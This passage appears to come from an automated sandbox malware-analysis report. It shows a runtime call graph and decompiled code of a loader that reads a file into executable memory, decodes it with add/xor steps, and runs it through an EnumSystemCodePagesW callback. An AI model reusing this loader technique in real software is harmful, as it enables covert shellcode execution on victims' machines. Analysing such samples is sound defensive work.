10808->10809 10809->10799 10810 bd007c GetModuleHandleExW 10809->10810 10811 bd00cf 10810->10811 10812 bd00bb GetProcAddress 10810->10812 10813 bd00eb 10811->10813 10814 bd00e2 FreeLibrary 10811->10814 10812->10811 10813->10799 10814->10813 10816 bd02df ___scrt_is_nonwritable_in_current_image 10815->10816 10830 bd25bd EnterCriticalSection 10816->10830 10818 bd02e9 10831 bd01e8 10818->10831 10820 bd02f6 10835 bd0314 10820->10835 10823 bd0120 10860 bd00fe 10823->10860 10826 bd013e 10828 bd007c __CreateFrameInfo 3 API calls 10826->10828 10827 bd012e GetCurrentProcess TerminateProcess 10827->10826 10829 bd0146 ExitProcess 10828->10829 10830->10818 10832 bd01f4 ___scrt_is_nonwritable_in_current_image 10831->10832 10834 bd025b __CreateFrameInfo 10832->10834 10838 bd080e 10832->10838 10834->10820 10859 bd25d4 LeaveCriticalSection 10835->10859 10837 bd01c7 10837->10804 10837->10823 10839 bd081a __EH_prolog3 10838->10839 10842 bd0a99 10839->10842 10841 bd0841 __CreateFrameInfo 10841->10834 10843 bd0aa5 ___scrt_is_nonwritable_in_current_image 10842->10843 10850 bd25bd EnterCriticalSection 10843->10850 10845 bd0ab3 10851 bd0964 10845->10851 10850->10845 10852 bd0983 10851->10852 10853 bd097b 10851->10853 10852->10853 10854 bd3723 ___free_lconv_mon 14 API calls 10852->10854 10855 bd0ae8 10853->10855 10854->10853 10858 bd25d4 LeaveCriticalSection 10855->10858 10857 bd0ad1 10857->10841 10858->10857 10859->10837 10865 bd41ed GetPEB 10860->10865 10863 bd011a 10863->10826 10863->10827 10864 bd0108 GetPEB 10864->10863 10866 bd4207 10865->10866 10867 bd0103 10865->10867 10869 bd2389 10866->10869 10867->10863 10867->10864 10870 bd2494 _unexpected 5 API calls 10869->10870 10871 bd23a5 10870->10871 10871->10867 10873 bcfed4 10872->10873 10874 bcfee6 ___scrt_uninitialize_crt 10872->10874 10875 bcfee2 10873->10875 10877 bd3dfd 10873->10877 10874->10157 10875->10157 10880 bd3f2c 10877->10880 10883 bd4005 10880->10883 10884 bd4011 ___scrt_is_nonwritable_in_current_image 10883->10884 10891 bd25bd EnterCriticalSection 10884->10891 10886 bd4087 10900 bd40a5 10886->10900 10890 bd401b ___scrt_uninitialize_crt 10890->10886 10892 bd3f79 10890->10892 10891->10890 10893 bd3f85 ___scrt_is_nonwritable_in_current_image 10892->10893 10903 bd40b1 EnterCriticalSection 10893->10903 10895 bd3f8f ___scrt_uninitialize_crt 10896 bd3fc8 10895->10896 10904 bd3e06 10895->10904 10915 bd3ff9 10896->10915 11017 bd25d4 LeaveCriticalSection 10900->11017 10902 bd3e04 10902->10875 10903->10895 10905 bd3e1b ___std_exception_copy 10904->10905 10906 bd3e2d 10905->10906 10907 bd3e22 10905->10907 10918 bd3e6b 10906->10918 10908 bd3f2c ___scrt_uninitialize_crt 79 API calls 10907->10908 10911 bd3e28 ___std_exception_copy 10908->10911 10911->10896 10913 bd3e4e 10931 bd6555 10913->10931 11016 bd40c5 LeaveCriticalSection 10915->11016 10917 bd3fe7 10917->10890 10919 bd3e84 10918->10919 10920 bd3e37 10918->10920 10919->10920 10921 bd6674 ___scrt_uninitialize_crt 29 API calls 10919->10921 10920->10911 10924 bd6674 10920->10924 10922 bd3ea0 10921->10922 10942 bd689b 10922->10942 10925 bd6695 10924->10925 10926 bd6680 10924->10926 10925->10913 10927 bd4844 ___free_lconv_mon 14 API calls 10926->10927 10928 bd6685 10927->10928 10929 bd37f6 ___std_exception_copy 29 API calls 10928->10929 10930 bd6690 10929->10930 10930->10913 10932 bd6566 10931->10932 10933 bd6573 10931->10933 10934 bd4844 ___free_lconv_mon 14 API calls 10932->10934 10935 bd65bc 10933->10935 10937 bd659a 10933->10937 10939 bd656b 10934->10939 10936 bd4844 ___free_lconv_mon 14 API calls 10935->10936 10938 bd65c1 10936->10938 10983 bd65d2 10937->10983 10941 bd37f6 ___std_exception_copy 29 API calls 10938->10941 10939->10911 10941->10939 10944 bd68a7 ___scrt_is_nonwritable_in_current_image 10942->10944 10943 bd696b 10945 bd3982 ___std_exception_copy 29 API calls 10943->10945 10944->10943 10946 bd68fc 10944->10946 10952 bd68af 10944->10952 10945->10952 10953 bd5e0e EnterCriticalSection 10946->10953 10948 bd6902 10949 bd691f 10948->10949 10954 bd669b 10948->10954 10980 bd6963 10949->10980 10952->10920 10953->10948 10955 bd66c0 10954->10955 10978 bd66e3 ___scrt_uninitialize_crt 10954->10978 10956 bd66c4 10955->10956 10958 bd6722 10955->10958 10957 bd3982 ___std_exception_copy 29 API calls 10956->10957 10957->10978 10959 bd6739 10958->10959 10960 bd88fc ___scrt_uninitialize_crt 31 API calls 10958->10960 10961 bd69a3 ___scrt_uninitialize_crt 51 API calls 10959->10961 10960->10959 10962 bd6743 10961->10962 10963 bd6789 10962->10963 10964 bd6749 10962->10964 10965 bd679d 10963->10965 10966 bd67ec WriteFile 10963->10966 10967 bd6750 10964->10967 10968 bd6773 10964->10968 10969 bd67da 10965->10969 10970 bd67a5 10965->10970 10971 bd680e GetLastError 10966->10971 10966->10978 10975 bd6df3 ___scrt_uninitialize_crt 6 API calls 10967->10975 10967->10978 10972 bd6a21 ___scrt_uninitialize_crt 56 API calls 10968->10972 10976 bd6e5b ___scrt_uninitialize_crt 7 API calls 10969->10976 10973 bd67c8 10970->10973 10974 bd67aa 10970->10974 10971->10978 10972->10978 10977 bd701f ___scrt_uninitialize_crt 8 API calls 10973->10977 10974->10978 10979 bd6f36 ___scrt_uninitialize_crt 7 API calls 10974->10979 10975->10978 10976->10978 10977->10978 10978->10949 10979->10978 10981 bd5e31 ___scrt_uninitialize_crt LeaveCriticalSection 10980->10981 10982 bd6969 10981->10982 10982->10952 10984 bd65de ___scrt_is_nonwritable_in_current_image 10983->10984 10996 bd5e0e EnterCriticalSection 10984->10996 10986 bd65ed 10987 bd6632 10986->10987 10997 bd5bc5 10986->10997 10989 bd4844 ___free_lconv_mon 14 API calls 10987->10989 10991 bd6639 10989->10991 10990 bd6619 FlushFileBuffers 10990->10991 10992 bd6625 GetLastError 10990->10992 11013 bd6668 10991->11013 11010 bd4857 10992->11010 10996->10986 10998 bd5bd2 10997->10998 11002 bd5be7 10997->11002 10999 bd4857 ___scrt_uninitialize_crt 14 API calls 10998->10999 11001 bd5bd7 10999->11001 11000 bd4857 ___scrt_uninitialize_crt 14 API calls 11004 bd5c17 11000->11004 11005 bd4844 ___free_lconv_mon 14 API calls 11001->11005 11002->11000 11003 bd5c0c 11002->11003 11003->10990 11006 bd4844 ___free_lconv_mon 14 API calls 11004->11006 11007 bd5bdf 11005->11007 11008 bd5c1f 11006->11008 11007->10990 11009 bd37f6 ___std_exception_copy 29 API calls 11008->11009 11009->11007 11011 bd279d __CreateFrameInfo 14 API calls 11010->11011 11012 bd485c 11011->11012 11012->10987 11014 bd5e31 ___scrt_uninitialize_crt LeaveCriticalSection 11013->11014 11015 bd6651 11014->11015 11015->10939 11016->10917 11017->10902 12485 bcd14b 12486 bcd153 12485->12486 12504 bd0f20 12486->12504 12488 bcd15e 12511 bcd51c 12488->12511 12490 bcd1d0 12491 bcd78c 4 API calls 12490->12491 12503 bcd1ed 12490->12503 12493 bcd1f5 12491->12493 12492 bcd173 __RTC_Initialize 12492->12490 12517 bcd396 12492->12517 12495 bcd18c 12520 bd0422 12495->12520 12499 bcd1a2 12546 bcd69b 12499->12546 12501 bcd1c5 12552 bd032b 12501->12552 12505 bd0f2f 12504->12505 12506 bd0f52 12504->12506 12505->12506 12507 bd4844 ___free_lconv_mon 14 API calls 12505->12507 12506->12488 12508 bd0f42 12507->12508 12509 bd37f6 ___std_exception_copy 29 API calls 12508->12509 12510 bd0f4d 12509->12510 12510->12488 12512 bcd52c 12511->12512 12513 bcd528 12511->12513 12514 bcd78c 4 API calls 12512->12514 12516 bcd539 ___scrt_release_startup_lock 12512->12516 12513->12492 12515 bcd5a2 12514->12515 12516->12492 12559 bcd3ab 12517->12559 12521 bd047c 12520->12521 12522 bd04b4 GetModuleFileNameW 12521->12522 12523 bd049e 12521->12523 12537 bcd197 12521->12537 12527 bd04d9 12522->12527 12524 bd4844 ___free_lconv_mon 14 API calls 12523->12524 12525 bd04a3 12524->12525 12526 bd37f6 ___std_exception_copy 29 API calls 12525->12526 12526->12537 12622 bd042d 12527->12622 12530 bd050f 12532 bd4844 ___free_lconv_mon 14 API calls 12530->12532 12531 bd051b 12533 bd0514 12531->12533 12534 bd0555 12531->12534 12532->12533 12535 bd3723 ___free_lconv_mon 14 API calls 12533->12535 12628 bd5080 12534->12628 12535->12537 12537->12490 12545 bcd68c InitializeSListHead 12537->12545 12539 bd056c 12541 bd3723 ___free_lconv_mon 14 API calls 12539->12541 12540 bd0576 12543 bd3723 ___free_lconv_mon 14 API calls 12540->12543 12542 bd0574 12541->12542 12544 bd3723 ___free_lconv_mon 14 API calls 12542->12544 12543->12542 12544->12537 12545->12499 12738 bd0753 12546->12738 12548 bcd6ac 12549 bcd6b3 12548->12549 12550 bcd78c 4 API calls 12548->12550 12549->12501 12551 bcd6bb 12550->12551 12553 bd264c _unexpected 50 API calls 12552->12553 12554 bd0336 12553->12554 12555 bd036e 12554->12555 12556 bd4844 ___free_lconv_mon 14 API calls 12554->12556 12555->12490 12557 bd0363 12556->12557 12558 bd37f6 ___std_exception_copy 29 API calls 12557->12558 12558->12555 12560 bcd3ba 12559->12560 12561 bcd3c1 12559->12561 12565 bd084c 12560->12565 12568 bd07db 12561->12568 12564 bcd3a1 12564->12495 12566 bd07db 32 API calls 12565->12566 12567 bd085e 12566->12567 12567->12564 12571 bd0a3e 12568->12571 12572 bd0a4a ___scrt_is_nonwritable_in_current_image 12571->12572 12579 bd25bd EnterCriticalSection 12572->12579 12574 bd0a58 12580 bd0862 12574->12580 12576 bd0a65 12590 bd0a8d 12576->12590 12579->12574 12581 bd087d 12580->12581 12583 bd08f0 _unexpected 12580->12583 12582 bd08d0 12581->12582 12581->12583 12593 bd599f 12581->12593 12582->12583 12585 bd599f 32 API calls 12582->12585 12583->12576 12587 bd08e6 12585->12587 12586 bd08c6 12588 bd3723 ___free_lconv_mon 14 API calls 12586->12588 12589 bd3723 ___free_lconv_mon 14 API calls 12587->12589 12588->12582 12589->12583 12621 bd25d4 LeaveCriticalSection 12590->12621 12592 bd080c 12592->12564 12594 bd59ac 12593->12594 12595 bd59c7 12593->12595 12594->12595 12596 bd59b8 12594->12596 12597 bd59d6 12595->12597 12602 bd8764 12595->12602 12599 bd4844 ___free_lconv_mon 14 API calls 12596->12599 12609 bd5e83 12597->12609 12601 bd59bd __CreateFrameInfo 12599->12601 12601->12586 12603 bd876f 12602->12603 12604 bd8784 HeapSize 12602->12604 12605 bd4844 ___free_lconv_mon 14 API calls 12603->12605 12604->12597 12606 bd8774 12605->12606 12607 bd37f6 ___std_exception_copy 29 API calls 12606->12607 12608 bd877f 12607->12608 12608->12597 12610 bd5e9b 12609->12610 12611 bd5e90 12609->12611 12613 bd5ea3 12610->12613 12619 bd5eac _unexpected 12610->12619 12612 bd492e 15 API calls 12611->12612 12617 bd5e98 12612->12617 12614 bd3723 ___free_lconv_mon 14 API calls 12613->12614 12614->12617 12615 bd5ed6 HeapReAlloc 12615->12617 12615->12619 12616 bd5eb1 12618 bd4844 ___free_lconv_mon 14 API calls 12616->12618 12617->12601 12618->12617 12619->12615 12619->12616 12620 bd3a5f _unexpected 2 API calls 12619->12620 12620->12619 12621->12592 12623 bd043e 12622->12623 12624 bd0470 12622->12624 12623->12624 12625 bd48d1 _unexpected 14 API calls 12623->12625 12624->12530 12624->12531 12626 bd0467 12625->12626 12627 bd3723 ___free_lconv_mon 14 API calls 12626->12627 12627->12624 12629 bd508b 12628->12629 12630 bd50ab 12629->12630 12640 bd50c1 12629->12640 12631 bd4844 ___free_lconv_mon 14 API calls 12630->12631 12632 bd50b0 12631->12632 12633 bd37f6 ___std_exception_copy 29 API calls 12632->12633 12649 bd50ba 12633->12649 12634 bd042d 14 API calls 12636 bd517f 12634->12636 12635 bd5135 12635->12634 12635->12635 12639 bd5188 12636->12639 12650 bd51a1 12636->12650 12642 bd3723 ___free_lconv_mon 14 API calls 12639->12642 12640->12635 12643 bd5149 12640->12643 12656 bd52f3 12640->12656 12688 bd53a7 12640->12688 12641 bcdb85 TranslatorGuardHandler 5 API calls 12644 bd0564 12641->12644 12642->12643 12704 bd5243 12643->12704 12644->12539 12644->12540 12645 bd520f 12646 bd3723 ___free_lconv_mon 14 API calls 12645->12646 12648 bd521c 12646->12648 12651 bd5243 14 API calls 12648->12651 12649->12641 12650->12645 12650->12650 12653 bd5236 12650->12653 12710 bd49e0 12650->12710 12651->12649 12654 bd3806 ___std_exception_copy 11 API calls 12653->12654 12655 bd5242 12654->12655 12657 bd5303 12656->12657 12657->12657 12658 bd5321 12657->12658 12659 bd48d1 _unexpected 14 API calls 12657->12659 12658->12640 12660 bd5336 12659->12660 12661 bd5349 12660->12661 12662 bd49e0 29 API calls 12660->12662 12663 bd49e0 29 API calls 12661->12663 12665 bd539a 12661->12665 12662->12661 12664 bd5362 12663->12664 12664->12665 12666 bd5369 12664->12666 12667 bd3806 ___std_exception_copy 11 API calls 12665->12667 12719 bd526c 12666->12719 12673 bd53a6 12667->12673 12670 bd537f 12672 bd3723 ___free_lconv_mon 14 API calls 12670->12672 12671 bd3723 ___free_lconv_mon 14 API calls 12671->12670 12672->12658 12674 bd5401 12673->12674 12675 bd5420 FindFirstFileExW 12673->12675 12676 bd52f3 32 API calls 12674->12676 12675->12674 12677 bd5457 12675->12677 12678 bd540c 12676->12678 12680 bd54b5 FindNextFileW 12677->12680 12681 bd52f3 32 API calls 12677->12681 12685 bd5501 FindClose 12677->12685 12679 bcdb85 TranslatorGuardHandler 5 API calls 12678->12679 12682 bd551b 12679->12682 12680->12677 12683 bd54ca 12680->12683 12681->12677 12682->12640 12684 bd54de FindClose 12683->12684 12730 bd8110 12683->12730 12684->12678 12685->12678 12689 bd53d2 12688->12689 12690 bd5420 FindFirstFileExW 12689->12690 12691 bd5401 12689->12691 12690->12691 12698 bd5457 12690->12698 12692 bd52f3 36 API calls 12691->12692 12693 bd540c 12692->12693 12694 bcdb85 TranslatorGuardHandler 5 API calls 12693->12694 12697 bd551b 12694->12697 12695 bd54b5 FindNextFileW 12695->12698 12699 bd54ca 12695->12699 12696 bd52f3 36 API calls 12696->12698 12697->12640 12698->12695 12698->12696 12701 bd5501 FindClose 12698->12701 12700 bd54de FindClose 12699->12700 12702 bd8110 29 API calls 12699->12702 12700->12693 12701->12693 12703 bd54fc 12702->12703 12703->12700 12708 bd5250 12704->12708 12709 bd5260 12704->12709 12705 bd3723 ___free_lconv_mon 14 API calls 12705->12708 12706 bd3723 ___free_lconv_mon 14 API calls 12707 bd5268 12706->12707 12707->12649 12708->12705 12708->12709 12709->12706 12711 bd49eb 12710->12711 12712 bd4a05 12711->12712 12713 bd4a19 12711->12713 12717 bd4a43 12711->12717 12712->12713 12714 bd4844 ___free_lconv_mon 14 API calls 12712->12714 12713->12650 12715 bd4a0f 12714->12715 12716 bd37f6 ___std_exception_copy 29 API calls 12715->12716 12716->12713 12717->12713 12718 bd4844 ___free_lconv_mon 14 API calls 12717->12718 12718->12715 12720 bd527e 12719->12720 12729 bd527a 12719->12729 12721 bd52a9 12720->12721 12722 bd5283 12720->12722 12724 bd599f 32 API calls 12721->12724 12721->12729 12723 bd48d1 _unexpected 14 API calls 12722->12723 12725 bd528c 12723->12725 12727 bd52c9 12724->12727 12726 bd3723 ___free_lconv_mon 14 API calls 12725->12726 12726->12729 12728 bd3723 ___free_lconv_mon 14 API calls 12727->12728 12728->12729 12729->12670 12729->12671 12731 bd814a 12730->12731 12732 bd4844 ___free_lconv_mon 14 API calls 12731->12732 12737 bd815e 12731->12737 12733 bd8153 12732->12733 12734 bd37f6 ___std_exception_copy 29 API calls 12733->12734 12734->12737 12735 bcdb85 TranslatorGuardHandler 5 API calls 12736 bd54fc 12735->12736 12736->12684 12737->12735 12739 bd0771 12738->12739 12743 bd0791 12738->12743 12740 bd4844 ___free_lconv_mon 14 API calls 12739->12740 12741 bd0787 12740->12741 12742 bd37f6 ___std_exception_copy 29 API calls 12741->12742 12742->12743 12743->12548

                          Executed Functions

                          Function 00BC18D0 Relevance: 33.7, APIs: 10, Strings: 9, Instructions: 466filememoryCOMMONCrypto
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 bc18d0-bc1939 call bd1031 3 bc193f-bc1946 0->3 4 bc194b-bc1a1d call bcfc90 CreateFileW GetFileSize VirtualAlloc ReadFile 0->4 5 bc20c3-bc20cf 3->5 8 bc1a20-bc1b2a 4->8 9 bc1b35-bc1b54 EnumSystemCodePagesW call bd0fad 8->9 10 bc1b30 8->10 12 bc1b59 9->12 10->8 13 bc1b60-bc1b66 12->13 14 bc1b6c-bc1b7f 13->14 15 bc1b84-bc1bbb GetOEMCP call bd0fa2 13->15 14->13 18 bc1bcd 15->18 19 bc1bc1-bc1bc8 15->19 20 bc1bd4-bc1bda 18->20 19->5 21 bc1eda-bc1ee1 20->21 22 bc1be0-bc1bff call bd1217 20->22 23 bc1ee7-bc1eee 21->23 24 bc1ef3-bc1ef7 21->24 31 bc1c05-bc1c0c 22->31 32 bc1c11-bc1c30 call bd1217 22->32 23->5 26 bc1efd 24->26 27 bc1f04-bc1f08 24->27 26->27 29 bc1f0e 27->29 30 bc1f15-bc1f44 call bc20e0 27->30 29->30 40 bc1f4a-bc1f51 30->40 41 bc1f56-bc1f5a 30->41 33 bc1ecc-bc1ed5 31->33 38 bc1c56-bc1c75 call bd1217 32->38 39 bc1c36-bc1c51 32->39 33->20 51 bc1c7b-bc1c87 38->51 52 bc1d03-bc1d22 call bd1217 38->52 39->33 40->5 43 bc1ffc-bc2010 call bc2440 41->43 44 bc1f60-bc1f91 GetStdHandle * 2 41->44 59 bc2016-bc201d 43->59 60 bc2022-bc2067 GetStartupInfoW call bd1279 call bc27b0 43->60 45 bc1fa4-bc1fbc call bc2310 44->45 46 bc1f97-bc1f9e 44->46 63 bc1fe8 45->63 64 bc1fc2-bc1fd6 call bc23a0 45->64 46->45 49 bc1fed 46->49 58 bc1ff7 49->58 56 bc1c8d-bc1c94 51->56 57 bc1c99-bc1cc3 call bd13a1 51->57 68 bc1d28-bc1d34 52->68 69 bc1db0-bc1dcf call bd1217 52->69 56->5 78 bc1cc9-bc1cd0 57->78 79 bc1cd6-bc1cdd 57->79 66 bc20a8-bc20c0 call bc29e0 58->66 59->5 89 bc207c-bc2087 60->89 90 bc206d-bc2077 60->90 63->58 64->63 84 bc1fdc-bc1fe3 64->84 66->5 74 bc1d3a-bc1d41 68->74 75 bc1d46-bc1d70 call bd13a1 68->75 87 bc1dd5-bc1de1 69->87 88 bc1e37-bc1e56 call bd1217 69->88 74->5 97 bc1d76-bc1d7d 75->97 98 bc1d83-bc1d8a 75->98 78->79 85 bc1cf2-bc1cf9 78->85 79->85 86 bc1ce3-bc1cec 79->86 84->5 85->5 86->85 92 bc1cfe 86->92 93 bc1de7-bc1dee 87->93 94 bc1df3-bc1e20 call bd13a1 87->94 104 bc1e5c-bc1e68 88->104 105 bc1ec0-bc1ec7 88->105 95 bc208c-bc20a5 ShowWindow 89->95 90->95 92->33 93->5 107 bc1e26-bc1e2d 94->107 108 bc1e32 94->108 95->66 97->98 101 bc1d9f-bc1da6 97->101 98->101 102 bc1d90-bc1d99 98->102 101->5 102->101 106 bc1dab 102->106 109 bc1e6e-bc1e75 104->109 110 bc1e7a-bc1ea9 call bd13a1 104->110 105->5 106->33 107->5 108->33 109->5 113 bc1eaf-bc1eb6 110->113 114 bc1ebb 110->114 113->5 114->33
                          C-Code - Quality: 17%
                          			E00BC18D0(void* __eflags, void* _a4, void* _a8, WCHAR* _a12, void* _a16) {
				struct _OVERLAPPED* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				struct _OVERLAPPED* _v32;
				signed short* _v36;
				void* _v40;
				void* _v44;
				long _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				struct _OVERLAPPED* _v64;
				signed int _v68;
				long _v72;
				struct _OVERLAPPED* _v76;
				signed short _v96;
				signed int _v100;
				signed int _v132;
				char _v144;
				signed int _v148;
				void* _v152;
				void* _v156;
				void* _v160;
				void* _v164;
				signed int _v168;
				signed int _v172;
				long _v176;
				void* __edi;
				struct _OVERLAPPED* _t248;
				void* _t252;
				void* _t256;
				int _t282;
				signed int _t283;
				signed int _t284;
				signed int _t287;
				signed int _t289;
				signed int _t292;
				void* _t304;
				void* _t305;
				signed int _t309;
				signed int _t312;
				signed int _t315;
				signed int _t318;
				signed int _t321;
				signed int _t324;
				signed int _t327;
				signed int _t329;
				signed int _t337;
				signed int _t343;
				signed int _t350;
				intOrPtr _t380;
				void* _t439;
				void* _t442;
				void* _t446;
				signed int* _t447;
				signed int* _t448;
				intOrPtr* _t449;
				signed int* _t450;
				intOrPtr* _t451;
				signed int* _t452;
				intOrPtr* _t454;

				_v16 = 0;
				_v20 = 0;
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v52 = 2;
				_v64 = 0;
				_v68 = 0;
				_v76 = 0;
				_v176 = 0x3d0900; // executed
				_t248 = E00BD1031(); // executed
				_v76 = _t248;
				if(_v76 != 0) {
					E00BCFC90(_t439, _v76, 0x54, 0x3d0900);
					_t252 = CreateFileW(_a12, 0x80000000, 1, 0, 3, 0x80, 0); // executed
					_v44 = _t252;
					_v48 = GetFileSize(_v44, 0);
					_t256 = VirtualAlloc(0, _v48, 0x3000, 0x40); // executed
					_v40 = _t256;
					__eflags = 0;
					ReadFile(_v44, _v40, _v48,  &_v72, 0); // executed
					_t446 = _t442 - 0xfffffffffffffff0;
					while(1) {
						 *(_v40 + _v68) =  *(_v40 + _v68) - 0xc8;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 1;
						 *(_v40 + _v68) =  *(_v40 + _v68) ^ 0x000000b1;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 0xff;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 0xf3;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 1;
						 *(_v40 + _v68) =  *(_v40 + _v68) ^ 0x000000af;
						 *(_v40 + _v68) =  *(_v40 + _v68) ^ 0x00000054;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 1;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 0xff;
						 *(_v40 + _v68) =  *(_v40 + _v68) - 0xb9;
						 *(_v40 + _v68) =  *(_v40 + _v68) - 0xf9;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 0xff;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 1;
						 *(_v40 + _v68) =  *(_v40 + _v68) ^ 0x0000000a;
						_v68 = _v68 + 1;
						__eflags = _v68 - _v48;
						if(_v68 >= _v48) {
							break;
						}
					}
					__eflags = 0;
					_v176 = _v40;
					_v172 = 0;
					EnumSystemCodePagesW(??, ??); // executed
					_t447 = _t446 - 8;
					 *_t447 = _v76;
					E00BD0FAD();
					_v68 = 0;
					while(1) {
						__eflags = _v68 - _v52;
						if(_v68 >= _v52) {
							break;
						}
						 *0xbe4918 = 0x1f7;
						_v68 = _v68 + 1;
					}
					_t282 = GetOEMCP();
					 *0xbe49b8 = _t282;
					 *0xbe49b4 = _t282;
					 *0xbe49a4 = 0x32;
					_t283 =  *0xbe49a4; // 0x0
					 *_t447 = _t283;
					_v176 = 4;
					_t284 = E00BD0FA2();
					 *0xbe49a0 = _t284;
					__eflags = _t284;
					if(_t284 != 0) {
						_v68 = 1;
						while(1) {
							__eflags = _v68 - _v52;
							if(_v68 >= _v52) {
								break;
							}
							 *_t447 =  *(_v56 + _v68 * 2) & 0x0000ffff;
							_v176 = L"--headless";
							_t312 = E00BD1217();
							__eflags = _t312;
							if(_t312 != 0) {
								 *_t447 =  *(_v56 + _v68 * 2) & 0x0000ffff;
								_v176 = L"--unix";
								_t315 = E00BD1217();
								__eflags = _t315;
								if(_t315 != 0) {
									 *_t447 =  *(_v56 + _v68 * 2) & 0x0000ffff;
									_v176 = L"--width";
									_t318 = E00BD1217();
									__eflags = _t318;
									if(_t318 != 0) {
										 *_t447 =  *(_v56 + _v68 * 2) & 0x0000ffff;
										_v176 = L"--height";
										_t321 = E00BD1217();
										__eflags = _t321;
										if(_t321 != 0) {
											 *_t447 =  *(_v56 + _v68 * 2) & 0x0000ffff;
											_v176 = L"--signal";
											_t324 = E00BD1217();
											__eflags = _t324;
											if(_t324 != 0) {
												 *_t447 =  *(_v56 + _v68 * 2) & 0x0000ffff;
												_v176 = L"--server";
												_t327 = E00BD1217();
												__eflags = _t327;
												if(_t327 != 0) {
													_v16 = 1;
												} else {
													_t329 = _v68 + 1;
													_v68 = _t329;
													__eflags = _t329 - _v52;
													if(_t329 != _v52) {
														 *_t447 =  *(_v56 + _v68 * 2) & 0x0000ffff;
														_v176 =  &_v36;
														_v172 = 0;
														 *0xbe4914 = E00BD13A1();
														__eflags =  *_v36;
														if( *_v36 == 0) {
															goto L47;
														} else {
															_v16 = 1;
														}
													} else {
														_v16 = 1;
													}
												}
											} else {
												_t337 = _v68 + 1;
												_v68 = _t337;
												__eflags = _t337 - _v52;
												if(_t337 != _v52) {
													 *_t447 =  *(_v56 + _v68 * 2) & 0x0000ffff;
													_v176 =  &_v36;
													_v172 = 0;
													_v32 = E00BD13A1();
													__eflags =  *_v36;
													if( *_v36 == 0) {
														goto L47;
													} else {
														_v16 = 1;
													}
												} else {
													_v16 = 1;
												}
											}
										} else {
											_t343 = _v68 + 1;
											_v68 = _t343;
											__eflags = _t343 - _v52;
											if(_t343 != _v52) {
												 *_t447 =  *(_v56 + _v68 * 2) & 0x0000ffff;
												_v176 =  &_v36;
												_v172 = 0;
												_v28 = E00BD13A1();
												__eflags = _v28;
												if(_v28 != 0) {
													L30:
													__eflags = _v28 - 0xffff;
													if(_v28 > 0xffff) {
														goto L32;
													} else {
														__eflags =  *_v36 & 0x0000ffff;
														if(( *_v36 & 0x0000ffff) == 0) {
															goto L47;
														} else {
															goto L32;
														}
													}
												} else {
													__eflags =  *0xbe4920;
													if( *0xbe4920 == 0) {
														L32:
														_v16 = 1;
													} else {
														goto L30;
													}
												}
											} else {
												_v16 = 1;
											}
										}
									} else {
										_t350 = _v68 + 1;
										_v68 = _t350;
										__eflags = _t350 - _v52;
										if(_t350 != _v52) {
											 *_t447 =  *(_v56 + _v68 * 2) & 0x0000ffff;
											_v176 =  &_v36;
											_v172 = 0;
											_v24 = E00BD13A1();
											__eflags = _v24;
											if(_v24 != 0) {
												L21:
												__eflags = _v24 - 0xffff;
												if(_v24 > 0xffff) {
													goto L23;
												} else {
													__eflags =  *_v36 & 0x0000ffff;
													if(( *_v36 & 0x0000ffff) == 0) {
														goto L47;
													} else {
														goto L23;
													}
												}
											} else {
												__eflags =  *0xbe4920;
												if( *0xbe4920 == 0) {
													L23:
													_v16 = 1;
												} else {
													goto L21;
												}
											}
										} else {
											_v16 = 1;
										}
									}
								} else {
									 *0xbe4920 = 1;
									 *0xbe4924 = 1;
									_v20 = 1;
									goto L47;
								}
							} else {
								_v20 = 1;
								L47:
								_v68 = _v68 + 1;
								continue;
							}
							goto L72;
						}
						__eflags =  *0xbe4914;
						if( *0xbe4914 != 0) {
							__eflags = _v24;
							if(_v24 == 0) {
								_v24 = 0x50;
							}
							__eflags = _v28;
							if(__eflags == 0) {
								_v28 = 0x96;
							}
							 *_t447 = 0xbe4914;
							_v176 = 1;
							_v172 = _v24;
							_v168 = _v28;
							_t287 = E00BC20E0(__eflags);
							_t448 = _t447 - 0x10;
							 *0xbe491c = _t287;
							__eflags = _t287;
							if(_t287 != 0) {
								__eflags = _v20;
								if(_v20 == 0) {
									 *_t448 = 0xbe4914;
									_t289 = E00BC2440(0);
									_t449 = _t448 - 4;
									__eflags = _t289;
									if(_t289 != 0) {
										 *_t449 =  &_v144;
										GetStartupInfoW(??);
										_t450 = _t449 - 4;
										 *_t450 = _v132;
										_t292 = E00BD1279();
										 *_t450 = 0xbe4914;
										_v176 = _v132;
										_v172 = _t292 << 1;
										E00BC27B0();
										_t451 = _t450 - 0xc;
										__eflags = _v100 & 0x00000001;
										if((_v100 & 0x00000001) == 0) {
											_v148 = 5;
										} else {
											_v148 = _v96 & 0x0000ffff;
										}
										_t380 =  *0xbe49bc; // 0x0
										 *_t451 = _t380;
										_v176 = _v148;
										ShowWindow(??, ??);
										_t452 = _t451 - 8;
										goto L71;
									} else {
										_v16 = 1;
									}
								} else {
									 *_t448 = 0xfffffff6;
									_t304 = GetStdHandle(??);
									_t454 = _t448 - 4;
									 *0xbe49c4 = _t304;
									 *_t454 = 0xfffffff5;
									_t305 = GetStdHandle(??);
									_t452 = _t454 - 4;
									 *0xbe49c8 = _t305;
									__eflags =  *0xbe49c4;
									if( *0xbe49c4 != 0) {
										L59:
										 *_t452 = 0xbe4914;
										E00BC2310();
										_t452 = _t452 - 4;
										__eflags =  *0xbe4920;
										if( *0xbe4920 != 0) {
											L62:
											goto L64;
										} else {
											 *_t452 = 0xbe4914;
											_t309 = E00BC23A0();
											_t452 = _t452 - 4;
											__eflags = _t309;
											if(_t309 != 0) {
												goto L62;
											} else {
												_v16 = 1;
											}
										}
									} else {
										__eflags =  *0xbe49c8;
										if( *0xbe49c8 == 0) {
											 *0xbe4928 = 1;
											L64:
											L71:
											 *_t452 = 0xbe4914;
											_v176 = _v32;
											_v16 = E00BC29E0();
										} else {
											goto L59;
										}
									}
								}
							} else {
								_v16 = 1;
							}
						} else {
							_v16 = 1;
						}
					} else {
						_v16 = 1;
					}
				} else {
					_v16 = 0;
				}
